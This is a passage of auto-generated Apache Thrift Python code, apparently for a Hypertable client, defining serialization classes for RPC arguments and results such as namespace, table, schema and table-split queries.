def __init__(self, mutator=None,):
self.mutator = mutator
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.mutator = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('flush_mutator_args')
if self.mutator != None:
oprot.writeFieldBegin('mutator', TType.I64, 1)
oprot.writeI64(self.mutator)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class flush_mutator_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('flush_mutator_result')
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_namespace_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ns = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_namespace_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.STRING, 1)
oprot.writeString(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_namespace_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_namespace_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_table_args:
"""
Attributes:
- ns
- name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'name', None, None, ), # 2
)
def __init__(self, ns=None, name=None,):
self.ns = ns
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_table_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.name != None:
oprot.writeFieldBegin('name', TType.STRING, 2)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class exists_table_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('exists_table_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_table_id_args:
"""
Attributes:
- ns
- table_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
)
def __init__(self, ns=None, table_name=None,):
self.ns = ns
self.table_name = table_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_table_id_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_table_id_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_table_id_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_schema_str_args:
"""
Attributes:
- ns
- table_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
)
def __init__(self, ns=None, table_name=None,):
self.ns = ns
self.table_name = table_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_schema_str_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_schema_str_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_schema_str_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_schema_args:
"""
Attributes:
- ns
- table_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
)
def __init__(self, ns=None, table_name=None,):
self.ns = ns
self.table_name = table_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_schema_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_schema_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (Schema, Schema.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Schema()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_schema_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_tables_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_tables_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_tables_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype189, _size186) = iprot.readListBegin()
for _i190 in xrange(_size186):
_elem191 = iprot.readString();
self.success.append(_elem191)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_tables_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter192 in self.success:
oprot.writeString(iter192)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_listing_args:
"""
Attributes:
- ns
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
)
def __init__(self, ns=None,):
self.ns = ns
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_listing_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_listing_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(NamespaceListing, NamespaceListing.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype196, _size193) = iprot.readListBegin()
for _i197 in xrange(_size193):
_elem198 = NamespaceListing()
_elem198.read(iprot)
self.success.append(_elem198)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = ClientException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_listing_result')
if self.success != None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter199 in self.success:
iter199.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e != None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_table_splits_args:
"""
Attributes:
- ns
- table_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'ns', None, None, ), # 1
(2, TType.STRING, 'table_name', None, None, ), # 2
)
def __init__(self, ns=None, table_name=None,):
self.ns = ns
self.table_name = table_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.ns = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.table_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_table_splits_args')
if self.ns != None:
oprot.writeFieldBegin('ns', TType.I64, 1)
oprot.writeI64(self.ns)
oprot.writeFieldEnd()
if self.table_name != None:
oprot.writeFieldBegin('table_name', TType.STRING, 2)
oprot.writeString(self.table_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_table_splits_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(TableSplit, TableSplit.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
